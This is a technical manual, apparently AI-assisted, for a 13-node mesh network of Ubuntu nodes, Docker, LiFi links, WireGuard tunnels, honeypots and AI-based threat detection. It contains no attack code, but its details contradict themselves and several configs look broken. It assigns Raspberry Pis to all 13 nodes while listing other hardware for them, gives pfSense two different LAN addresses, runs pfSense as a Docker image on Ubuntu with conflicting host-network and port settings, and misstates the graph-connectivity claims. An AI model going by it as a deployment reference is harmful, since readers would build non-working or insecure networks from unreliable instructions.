Technical Manual for the Ambient Invisible Intelligence Mesh (AIIM) Network

The Ambient Invisible Intelligence Mesh (AIIM) Network represents a cutting-edge distributed system meticulously designed to address the evolving demands of advanced cyber observability and autonomous threat detection in modern network environments. Built atop Ubuntu Server 24.04 Pro, this sophisticated 13-node mesh network employs a fully connected topology inspired by the geometric elegance of Metatron's Cube. By integrating Docker containers for service isolation, LiFi technology for high-speed internal communication, and WireGuard VPNs for secure external connectivity, the AIIM Network delivers a robust and innovative solution. This technical manual provides an exhaustive guide for network administrators and IT professionals, detailing the steps required to set up, configure, operate, and maintain the AIIM Network, ensuring its optimal performance, scalability, and security as of April 2, 2025.

1.1 Purpose

The primary purpose of the AIIM Network is to establish a resilient platform capable of continuously monitoring and analyzing network traffic, detecting potential threats in real-time, and maintaining secure, encrypted communication channels across its distributed nodes. This network leverages state-of-the-art technologies such as LiFi—a light-based communication protocol—and AI-driven anomaly detection powered by frameworks like TensorFlow and PyTorch. It aims to provide a pioneering solution for cybersecurity challenges, offering unparalleled observability and rapid response capabilities to safeguard sensitive data and infrastructure in an increasingly interconnected world.

1.2 Key Features

• 13-Node Mesh Network: Implements a fully connected K₁₃ topology, ensuring high redundancy and fault tolerance by allowing each node to communicate directly with every other node.
• Operating System: Utilizes Ubuntu Server 24.04 Pro across all nodes, providing a stable, secure, and widely supported Linux distribution tailored for server environments.
• Containerization: Employs Docker to encapsulate services, enhancing isolation, scalability, and ease of deployment across heterogeneous hardware.
• LiFi Technology: Leverages light-based communication for internal LAN connectivity, delivering approximately 100 Mbps with enhanced security due to its line-of-sight (LOS) nature.
• WireGuard VPN: Incorporates lightweight, high-performance VPN tunnels for secure external communication, optimized for minimal overhead and strong encryption.
• Threat Detection: Integrates honeypots (Cowrie) to lure and analyze malicious actors, alongside Suricata for intrusion detection, bolstering network security.
• AI Integration: Harnesses TensorFlow and PyTorch frameworks for real-time anomaly detection and threat scoring, enabling proactive threat mitigation.

1.3 Audience

This manual targets network administrators, cybersecurity professionals, and IT specialists with a foundational understanding of Linux-based systems, containerization technologies, and network security principles. Readers are expected to possess working knowledge of Ubuntu Server administration, Docker container management, and basic networking concepts such as IP addressing, routing, and VPN configuration. Familiarity with command-line interfaces (CLI) and system troubleshooting is also assumed to fully leverage the detailed instructions provided herein.

1.4 Scope and Context

Developed as a proof-of-concept for advanced cyber observability, the AIIM Network combines theoretical graph theory (K₁₃ topology) with practical implementations of emerging technologies like LiFi and containerized microservices. This manual covers the complete lifecycle of the network—from hardware preparation and software installation to operational monitoring and security hardening—while providing context for its deployment in real-world scenarios such as enterprise security, research labs, or edge computing environments. The removal of prior claims about being the "world's smallest mesh" ensures a focus on technical merit rather than unverifiable assertions, aligning with professional documentation standards.

The AIIM Network is architecturally designed as a 13-node mesh network adhering to a fully connected graph structure, denoted as K₁₃ in graph theory nomenclature. This configuration ensures that every node maintains a direct connection to all other nodes, maximizing redundancy and resilience against failures or attacks—a critical feature for a system tasked with continuous observability and threat detection.

2.1 Nodes and Roles

1. pfSense (Node 0)
   Role: Acts as the central firewall and VPN gateway, serving as the primary entry and exit point for network traffic.
   Services: Manages inbound and outbound traffic, provides DHCP for IP assignment within the LAN, and hosts a WireGuard VPN server for secure external connectivity.
   IP Address: 192.168.1.1/24 (LAN), dynamically assigned WAN IP.
2. IONOS-VPS1 (Node 1)
   Role: Functions as a cloud-based external gateway, bridging the internal mesh to external networks.
   Services: Runs an Nginx reverse proxy for traffic routing, a WireGuard client for VPN connectivity, a Tor exit node for anonymized external traffic, and Suricata for intrusion detection.
   IP Address: 65.38.96.106 (public).
3. IONOS-VPS2 (Node 2)
   Role: Operates as a cloud-based honeypot to attract and analyze malicious activities.
   Services: Hosts Cowrie for SSH/Telnet emulation, a WireGuard client for secure tunneling, and a Tor relay to support anonymized routing.
   IP Address: 74.208.11.214 (public).
4. ASUS-Aspire (Node 3)
   Role: Serves as an internal web and DNS server, supporting network services and name resolution.
   Services: Runs Nginx for web hosting and Bind9 for DNS resolution.
   IP Address: 10.0.0.50/24.
5. HPMini (Node 4)
   Role: Acts as a sensor hub, integrating physical monitoring capabilities into the network.
   Services: Employs HAProxy for load balancing and MotionEye for managing camera feeds.
   IP Address: 10.0.0.20/24.
6. Proxmox-Server (Node 5)
   Role: Functions as the virtualization host, managing a cluster of virtual machines (VMs) and containers.
   Services: Utilizes Docker Swarm for orchestration of VMs and containers across the network.
   IP Address: 10.0.0.171/24.
7. Legion-Laptop (Node 6)
   Role: Dedicated to AI inference, processing data for anomaly detection and threat analysis.
   Services: Runs TensorFlow for machine learning tasks and an SSH server for remote access.
   IP Address: 192.168.1.7.
8. Proxmox-VM2 to Proxmox-VM7 (Nodes 7-12)
   Roles: Specialized service nodes hosted on the Proxmox-Server:
   - Node 7 (Proxmox-VM2): Analytics with Elasticsearch (10.0.0.172/24).
   - Node 8 (Proxmox-VM3): Backup with BorgBackup (10.0.0.173/24).
   - Node 9 (Proxmox-VM4): Staging environment with Nginx (10.0.0.174/24).
   - Node 10 (Proxmox-VM5): Monitoring with Prometheus (10.0.0.175/24).
   - Node 11 (Proxmox-VM6): Database management with PostgreSQL (10.0.0.176/24).
   - Node 12 (Proxmox-VM7): Load balancing with HAProxy (10.0.0.177/24).

2.2 Connectivity

The AIIM Network employs a dual-tier connectivity model to balance internal efficiency and external security:

• LAN Connectivity: Internal communication is facilitated by LiFi transceivers, providing approximately 100 Mbps within a compact 1m² cube. LiFi’s use of visible light ensures high-speed connectivity while enhancing security by requiring line-of-sight (LOS), thereby reducing risks associated with traditional cabling.
• External Connectivity: External nodes (IONOS-VPS1 and IONOS-VPS2) connect to the internal mesh via WireGuard VPN tunnels over the public internet. These tunnels encrypt traffic, ensuring secure communication between geographically dispersed nodes.

2.3 Topology Diagram

*(Note: In a production environment, include an SVG or PNG diagram here illustrating the 13-node topology. Green dashed lines represent LiFi connections; orange solid lines indicate WireGuard VPN links. A legend should explain line styles, colors, and node roles.)*

2.4 Communication Protocols

• LiFi: Provides high-speed internal LAN communication (~100 Mbps), leveraging IEEE 802.15.7 standards for visible light communication (VLC).
• WireGuard: Implements lightweight, encrypted VPN tunnels for external links, using modern cryptographic algorithms for efficiency and security.
• TCP/IP: Serves as the foundational protocol for internet communication, with pfSense managing routing and NAT operations.

2.5 Resilience and Fault Tolerance

The K₁₃ topology underpins the network’s exceptional resilience:

• Edge Connectivity (λ): 12, meaning 12 edges must be severed to disconnect the network.
• Vertex Connectivity (κ): 12, indicating that 12 nodes must fail to fragment the network.

These metrics guarantee that the AIIM Network remains functional during disruptions, making it ideal for mission-critical applications.

2.6 Design Rationale

Inspired by Metatron's Cube, the fully connected K₁₃ topology maximizes communication pathways, reducing latency and enhancing fault tolerance. LiFi offers a forward-thinking approach to LAN connectivity by prioritizing security and bandwidth efficiency, while WireGuard provides a simple, high-performance solution for external VPN needs.

3.1 Hardware Requirements

Deploying the AIIM Network necessitates a precise combination of hardware components:

• 13 Raspberry Pi 5s: Each with 8GB RAM, forming the backbone for Nodes 0-12, ideal for containerized workloads and LiFi integration.
• IONOS VPS #1: A virtual private server with 16GB RAM for Node 1’s external gateway functions.
• IONOS VPS #2: An 8GB RAM VPS for Node 2, functioning as a honeypot and external relay.
• ASUS Server: With 64GB RAM for high-performance web and DNS services (Node 3).
• Desktop i5: A 32GB RAM system for Node 4, managing sensor hub and camera integration.
• Mini PC: Another 32GB RAM device for Node 5, handling virtualization tasks.
• Legion Slim 5: A 64GB RAM laptop for Node 6, optimized for AI inference workloads.
• LiFi Transceivers: One per node (e.g., pureLiFi LiFi-XC) to enable light-based LAN connectivity.
• Camera: A USB or IP camera attached to Node 4 for MotionEye surveillance.

3.2 Software Requirements

The software stack is selected to support the network’s distributed architecture:

• Ubuntu Server 24.04 Pro: The primary OS for all nodes, ensuring stability, security, and long-term support.
• Docker: For containerization, enabling isolated, portable service deployments.
• WireGuard: For secure VPN tunneling, providing lightweight encryption and high performance.
• pfSense: For firewall and VPN gateway functionality on Node 0.
• Nginx: For web server and reverse proxy services (Nodes 1, 3, and others).
• Bind9, HAProxy, MotionEye: For DNS resolution, load balancing, and camera management respectively.
• TensorFlow/PyTorch: For AI-driven anomaly detection on Node 6.
• Suricata and Cowrie: For intrusion detection and honeypot operations (Nodes 1 and 2).
• Prometheus, Elasticsearch, BorgBackup, PostgreSQL: For monitoring, log analytics, backup, and database management (Nodes 7-12).

3.3 Prerequisites

Prior to deployment, ensure stable power supplies, reliable internet connectivity, and proper physical arrangement of devices to meet LiFi LOS requirements.

4.1 Preparing the Hardware

Assemble each Raspberry Pi 5 with its power supply, case, heat sink, and attach the LiFi transceiver as per the manufacturer’s guidelines. Provision the VPS instances via the IONOS dashboard and set up the ASUS Server, Desktop, Mini PC, and Legion Laptop with appropriate network connections.

4.2 Installing Ubuntu Server

Download the Ubuntu Server 24.04 Pro ISO from ubuntu.com. Create a bootable USB using Rufus or Etcher, then boot the device and follow the installation prompts. For VPS instances, select Ubuntu Server during provisioning.

4.3 Configuring Network Interfaces

For LiFi connectivity, install the required drivers and assign static IP addresses in the 10.0.0.0/24 subnet via the `/etc/netplan/01-netcfg.yaml` file. Apply changes using sudo netplan apply. Configure pfSense with the LAN interface on 10.0.0.1/24 and set the WAN interface accordingly.

4.4 Setting Up Docker and Swarm

sudo apt update
sudo apt install -y docker.io
sudo systemctl enable docker
sudo systemctl start docker

# On Node 5 (Proxmox-Server)
docker swarm init --advertise-addr 10.0.0.171

# On other nodes, join the swarm using the token:
docker swarm join --token <token> 10.0.0.171:2377
      

4.5 Configuring WireGuard VPN

On Node 0 (pfSense), install the WireGuard package, generate keys, and configure the WireGuard interface. For Nodes 1 and 2, install WireGuard and create appropriate client configuration files.

4.6 Deploying Containers

Use Docker commands to deploy containers for each service. For example, deploy pfSense on Node 0, Nginx on Node 1, and TensorFlow on Node 6. Adjust ports, volumes, and environment variables as required.

4.7 Setting Up LiFi Transceivers

Follow the pureLiFi guidelines to pair each transceiver. Test connectivity using ping to verify communication within the 10.0.0.x subnet.

4.8 Configuring MotionEye

sudo apt install -y motion motioneye
sudo systemctl enable motioneye
sudo systemctl start motioneye
      

5.1 Monitoring

Deploy Prometheus on Node 10:

docker run -d --name prometheus -p 9090:9090 prom/prometheus
      

Configure Prometheus to scrape metrics from all nodes. Integrate Grafana for visualization.

5.2 Updating Software

sudo apt update
sudo apt upgrade -y
docker pull <image>
docker rm -f <container>
docker run -d <image>
      

5.3 Backup and Recovery

borg init -e repokey /backup
borg create /backup::daily-{now} /data
      

5.4 Log Management

Deploy Elasticsearch on Node 7 for centralized log analysis and set up retention policies.

6.1 Firewall Configuration

Use pfSense to restrict traffic to essential ports (e.g., 22, 80, 443, 51820). Implement traffic shaping if necessary.

6.2 Encryption and Key Management

Enforce strong ciphers for both LiFi and WireGuard. Rotate VPN keys every 90 days.

6.3 Intrusion Detection and Honeypots

Configure Suricata for real-time IDS and deploy Cowrie on Node 2 to simulate vulnerable services and capture malicious activity.

6.4 AI-Driven Anomaly Detection

Train AI models using TensorFlow and PyTorch with historical network data and deploy on Node 6 to detect anomalies in real-time.

7.1 Node Connectivity Issues

Check: LiFi alignment, static IP configurations, and netplan settings.
Fix: Re-align transceivers, update IP settings in /etc/netplan, and apply with sudo netplan apply.

7.2 VPN Failures

Check: WireGuard key validity and firewall rules on pfSense.
Fix: Regenerate keys if necessary and review pfSense WireGuard configuration.

7.3 Container Failures

Check: Container logs using docker logs <container> and resource usage.
Fix: Increase resource limits or redeploy containers.

Appendix A: Sample WireGuard Config

[Interface]
PrivateKey = <private_key>
Address = 10.0.0.1/24
ListenPort = 51820

[Peer]
PublicKey = <peer_public_key>
AllowedIPs = 10.0.0.2/32
Endpoint = 65.38.96.106:51820
      

Appendix B: Docker Compose for Node 0

version: '3'
services:
  pfsense:
    image: pfsense/pfsense
    network_mode: host
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./pfsense_config:/config
      

Key Points

• Scalability, hierarchical design, and QoS are critical to future-proofing the network.
• Redundancy and failover mechanisms are essential to maintain continuous operations.
• Comprehensive performance monitoring and automated security measures ensure operational excellence.

9.1 Introduction to Missing Network Principles

The Ambient Invisible Intelligence Mesh (AIIM) Network is a pioneering 13-node system designed for advanced cyber observability and threat detection. While the foundational aspects of architecture, installation, and basic security are covered, several critical network design principles remain underexplored. These include hierarchical design, modularity, Quality of Service (QoS), scalability planning, network segmentation, comprehensive performance monitoring, redundancy and failover, and adherence to industry standards.

In the following sections, we delve deep into these principles to provide network administrators with an exhaustive guide. This advanced documentation not only enhances the overall technical manual but also serves as a reference for implementing best practices in high-performance, secure, and scalable network infrastructures.

9.2 Hierarchical Design and Modularity

9.2.1 Hierarchical Network Design

Hierarchical network design is a proven strategy in managing large-scale networks. It divides the network into layers—core, distribution, and access—each with distinct responsibilities. For the AIIM Network:

• Core Layer: Central nodes (such as pfSense) manage high-speed backbone traffic and interface with external networks.
• Distribution Layer: Intermediate nodes (like Proxmox-Server and Legion-Laptop) handle traffic routing and load balancing, providing a buffer between the core and access layers.
• Access Layer: End-point nodes (such as ASUS-Aspire and HPMini) deliver services and connect end devices to the network.

Formalizing these layers minimizes broadcast domains and simplifies troubleshooting. In practice, this means that adding a new node in the access layer would not require reconfiguring every connection in the network—only the distribution layer would need to be updated.

9.2.2 Modularity

Modularity involves organizing the network into discrete functional blocks, such as security, data, and AI modules. This approach isolates different services, making it easier to manage and upgrade parts of the network without affecting the whole system. For example, grouping all security-related functions (firewall, IDS, honeypot) into one module allows for centralized updates and streamlined monitoring.

9.3 Quality of Service (QoS)

QoS is essential for ensuring that critical applications, such as real-time AI inference and network monitoring, receive priority over less critical traffic. By marking traffic with DSCP values and configuring bandwidth allocation on pfSense, administrators can control latency, jitter, and packet loss. In the AIIM Network:

• High-priority traffic from AI modules should be given precedence over backup or archival traffic.
• Implementing QoS on LiFi connections ensures that even in congested conditions, the most critical data flows without interruption.

9.4 Scalability and Load Balancing

The AIIM Network's fully connected K₁₃ topology is ideal for a small-scale deployment; however, future expansion requires a well-defined scalability plan. This plan should include:

• Expanding Core and Distribution Layers: Adding nodes to handle additional workloads without disrupting existing traffic flows.
• Implementing Load Balancers: Using HAProxy or similar tools to distribute traffic evenly across service nodes, thus preventing any single node from becoming a bottleneck.
• Modular Expansion: Creating additional network modules for security, data, or AI processing, connected through high-speed backbone links.

9.5 Network Segmentation and Enhanced Security

Segmentation divides the network into isolated zones, limiting the spread of potential breaches. In the AIIM Network:

• Security zones should isolate critical services such as intrusion detection, AI inference, and data processing.
• Implementing VLANs and ACLs ensures that only authorized traffic passes between segments, thereby reducing lateral movement for attackers.

A Zero Trust approach can further secure the network by verifying every access request and continuously monitoring all traffic.

9.6 Performance Monitoring and Optimization

Continuous performance monitoring is critical for maintaining an efficient network. Beyond using Prometheus for basic metrics, administrators should track:

• Bandwidth utilization across LiFi and VPN links.
• Latency and jitter between critical nodes.
• Packet loss and error rates during peak loads.

Optimization strategies include fine-tuning kernel parameters via sysctl, optimizing disk I/O with SSDs and RAID configurations, and adjusting network buffers. Regular performance benchmarks using tools such as Phoronix Test Suite provide insights into the impact of configuration changes.

9.7 Redundancy and Failover Mechanisms

Despite the high connectivity of the K₁₃ topology, physical redundancy is paramount. This involves:

• Deploying dual power supplies and backup LiFi transceivers for critical nodes.
• Configuring pfSense for WAN failover with multiple ISPs.
• Utilizing Docker Swarm’s inherent failover capabilities to automatically restart containers on alternative nodes if a host fails.

9.8 Compliance with Industry Standards

Ensuring compliance with regulations such as GDPR and ISO 27001 is critical. The AIIM Network should incorporate:

• Strict data handling policies, especially for logs and monitoring data stored in Elasticsearch.
• Comprehensive audit trails and regular security assessments using tools like Nessus.
• Documented change management processes to support regulatory compliance and operational transparency.

9.9 Future Directions and Emerging Trends

The field of network design is rapidly evolving with the integration of AI, edge computing, and intent-based networking. Future enhancements to the AIIM Network may include:

• Intent-Based Networking (IBN): Automating network configuration based on high-level business policies.
• Edge Computing: Distributing processing closer to the data source for improved latency and efficiency.
• Serverless Architectures: Leveraging cloud functions to handle transient workloads without dedicated infrastructure.
• Enhanced AI Integration: Using advanced machine learning algorithms for predictive maintenance and automated threat remediation.

Staying ahead of these trends will require ongoing research, training, and adaptation. The AIIM Network manual should be viewed as a living document—continuously updated to reflect the latest technological advancements and best practices.

9.10 Conclusion

By integrating hierarchical design, modularity, Quality of Service, scalability planning, network segmentation, comprehensive performance monitoring, redundancy, and compliance measures, the AIIM Network is poised to become a benchmark in secure, high-performance distributed systems. This extended documentation not only fills in the gaps of the initial manual but also provides a forward-looking perspective essential for operating in an ever-changing technological landscape.

With these enhancements, network administrators and IT professionals are equipped with an exhaustive guide that empowers them to deploy, manage, and continuously improve the AIIM Network. As new challenges and opportunities arise, the principles and strategies outlined herein will serve as a robust foundation for future innovation and operational excellence.